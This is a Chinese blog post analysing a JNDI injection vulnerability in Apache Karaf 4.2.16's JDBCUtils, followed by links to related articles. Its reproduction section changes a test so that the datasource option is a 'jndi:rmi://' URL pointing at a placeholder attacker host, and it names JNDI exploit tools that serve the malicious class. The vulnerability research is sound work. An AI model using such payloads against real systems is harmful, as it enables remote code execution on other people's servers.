漏洞深度分析|Apache Karaf 4.2.16 存在JNDI 注入漏洞

最新推荐文章于 2024-06-17 19:47:02 发布
最新推荐文章于 2024-06-17 19:47:02 发布
阅读量1k 收藏
点赞数
分类专栏: 漏洞深度分析 文章标签: apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LJQClqjc/article/details/128422802
版权

项目地址

GitHub - apache/karaf: Mirror of Apache Karaf

项目介绍

Apache Karaf是一个模块化运行时,支持多种框架和编程模型(REST/API、web、spring boot 等)。它提供了统包功能,您可以毫不费力地直接利用这些功能,打包为可变或不可变的应用程序。

项目版本

4.2.16

漏洞分析

该项目重写 JDBCUtils 作为连接数据库功能;在 jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils 使用了 jndi 协议测试链接是否正常访问,但是在 doCreateDatasource 函数中调用了 ic.lookup(jndiName) 来初始化查找数据库

 

lookup存在两个重载

看一下 lookup 的调用方法,传进 InitialContext#getURLOrDefaultInitCtx

lookup 拿到 name ,getURLScheme匹配 :和 /;之后获取链接内容,getURLContext 解释包含样例

For example, if the scheme id is "ldap", and the Context. URL_PKG_PREFIXES property contains "com.widget:com.wiz. jndi", the naming manager would attempt to load the following classes until one is successfully instantiated:
· com.widget.ldap.ldapURLContextFactory
· com.wiz.jndi.ldap.ldapURLContextFactory
· com.sun.jndi.url.ldap.ldapURLContextFactory

而我们可以控制 lookup 函数的参数,使客户端访问提前设置好的恶意的 RMI 服务链接来加载恶意的对象class 字节码文件来实例化,从而执行代码,完成利用。

该类并不存在任何黑/白名单对用户传入进行过滤,用户可直接传入rmi 恶意链接执行命令。确定该处存在 jndi注入,可被利用导致命令执行

漏洞复现

该项目无web界面,利用方式可使用官方提供的Test类进行测试。 测试类为 JdbcLoginModuleTest

该项目测试类并没有测试 jndi 协议,而是测试 osgi 协议。为了复现我们需要更改为 jndi 协议。代码如下所示

        options = new HashMap<>();
//        options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());
        options.put(JDBCUtils.DATASOURCE, "jndi:rmi://x.x.x.x:23456/Command8");
        options.put(BundleContext.class.getName(), context);

因为是jndi注入,需要配置注入payload及工具,以 JNDI-1.0-all.jar 为例,无需配置相关选项,仅使用默认 config.properties 即可弹出计算器

修复方式

升级到最新版本

棱镜七彩
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2018-11788:Apache Karaf XXE漏洞(CVE-2018-11788)
03-18
在最近对Apache Karaf的研究中,我发现其XML解析器中存在一些XXE(XML外部实体注入漏洞。 导致解析器不正确地解析XML文档。受影响的版本Apache Karaf <= 4.2.1 Apache Karaf <= 4.1.6分析根据,Apache ...
maven karaf 4.0x中使用jetty部署web 应用;karaf 4.0 x离线使用
极客编程的专栏
07-05 2186
maven 打包karaf 4.0 x features<dependency> <groupId>org.apache.karaf.features</groupId> <artifactId>framework</artifactId> <type>kar</type> <version>4.0.2</version> </
java asm jndi_GitHub - superroshan/JNDI: JNDI 注入利用工具
weixin_28929351的博客
02-13 221
JNDI 注入利用工具介绍本项目为 JNDI 注入利用工具,生成 JNDI 连接并启动后端相关服务,可用于 Fastjson、Jackson 等相关漏洞的验证。本项目是基于 welk1n 的 JNDI-Injection-Exploit,在此项目的基础服务框架上,重新编写了攻击利用代码,支持更多更强大的功能,并加入了多种方式进行回显的支持。本项目为学习性项目,目前本人 Java 水平依然处于 he...
Log4j2的JNDI注入漏洞原理分析与思考
最新发布
2401_85763924的博客
06-17 706
通过JNDI,可以将数据库相关的配置在一个支持JNDI服务的容器(通常Tomat等Web容器均支持)中统一完成,并暴露一个简洁的名称,该名称背后绑定着一个 DataSource 对象。再举个更简单的例子,这有点类似DNS提供域名到IP地址的解析服务。可以看到,rc1补丁通过对JNDI Lookup增加白名单的方式,限制默认可以访问的主机为本地IP,限制默认支持的协议类型为 java 、 ldap 、 ldaps ,限制LDAP协议默认可以使用的Java类型为少数基础类型,从而大大减少了默认的攻击面。
开源漏洞深度分析|CVE-2022-34916 JNDI命令执行漏洞
LJQClqjc的博客
09-02 1383
开源漏洞深度分析|CVE-2022-34916 JNDI命令执行漏洞
class文件修改工具_JNDIInjectionExploit JNDI注入利用工具
weixin_32629285的博客
01-02 6418
介绍JNDI注入利用工具,生成JNDI链接并启动后端相关服务,可用于Fastjson、Jackson等相关漏洞的验证。使用可执行程序为jar包,在命令行中运行以下命令:$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]其中:-C - 远程class文件中要执行的命令。...
karaf-decanter:Apache Karaf Decanter的镜子
05-03
阿帕奇·卡拉夫·Decanter Apache Karaf Decanter是Apache Karaf的完整监视平台。 它非常可扩展,灵活,易于安装和使用。概述收集器:收集器负责收集监视数据。 可以使用两种收集器:*调度程序定期调用轮询收集器*...
[Apache Karaf] Apache Karaf 学习教程 (英文版)
03-16
[Packt Publishing] Apache Karaf 学习教程 (英文版) [Packt Publishing] Learning Apache Karaf (E-Book) ☆ 图书概要:☆ Develop and deploy applications using the OSGi-based runtime container, Apache ...
Learning Apache Karaf 配套源码
02-07
Apache Karaf 是一个轻量级、可嵌入式的Java企业服务 Bus(ESB)和运行时,基于OSGi规范。它被广泛用于构建模块化的Java应用程序和服务,特别适合微服务和云计算环境。这本书《Learning Apache Karaf》显然是为了...
apache karaf 2.3.4(Windows版本)
11-08
Apache KarafApache软件基金会开发的一个轻量级OSGi容器,它主要用于构建、部署和管理Java应用程序。在Windows环境下,Apache Karaf提供了便捷的运行方式,使得开发者可以在该平台上快速地进行开发和测试工作。...
karaf-site:Apache karaf网站的镜像
05-02
Apache Karaf网站该项目包含Apache Karaf网站。贡献具体的存储库位于svn上,但是如果您想贡献,则必须克隆Github存储库(它是一个镜像)并提供您的更改请求。 您可以在项目的社区页面( )上找到有关如何捐款的更多...
apache-karaf-3.0.2.tar.gz
06-12
KarafApache旗下的一个开源项目.Karaf同时也是一个基于OSGi的运行环境,Karaf提供了一个轻量级的OSGi容器,可以用于部署各种组件,应用程序.Karaf提供了很多特性用于帮助开发者和用户更加灵活的部署应用,例如:热部署,...
apache-karaf-4.0.2.tar.gz
12-26
Apache Karaf是一款轻量级的Java企业服务框架(Service-Oriented Container),它基于OSGi标准,用于构建、部署和管理模块化应用。这个“apache-karaf-4.0.2.tar.gz”是一个压缩包文件,包含了Apache Karaf 4.0.2...
learning-apache-karaf:学习Apache Karaf,书籍源代码-apache source code
03-25
10. **源代码分析**:通过阅读"学习Apache Karaf"的源代码,可以深入理解Karaf的工作原理,以及如何设计和实现一个基于OSGi的应用。 这个压缩包中的"learning-apache-karaf-master"可能是这本书的源码仓库,你可以...
Apache Kafka Connect JNDI注入漏洞复现(CVE-2023-25194)
0xSec
03-18 6207
Apache Kafka Connect中存在JNDI注入漏洞,当攻击者可访问Kafka Connect Worker,且可以创建或修改连接器时,通过设置sasl.jaas.config属性为com.sun.security.auth.module.JndiLoginModule,进而可导致JNDI注入,造成RCE需低版本JDK或目标Kafka Connect系统中存在利用链。
log4j2 JNDI注入漏洞问题处理
逗神的博客
12-13 3184
log4j2 JNDI注入漏洞问题处理
JNDI注入漏洞
qq_61553520的博客
05-23 1232
基于Reference的远程/本地加载Factory类,攻击端需要启动LDAP/RMI目录服务,当攻击机请求之后,就会加载远程/本地的Factory来实现远程代码执行。反序列化的利用则是直接注入恶意的序列化数据,来达到远程代码执行的目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值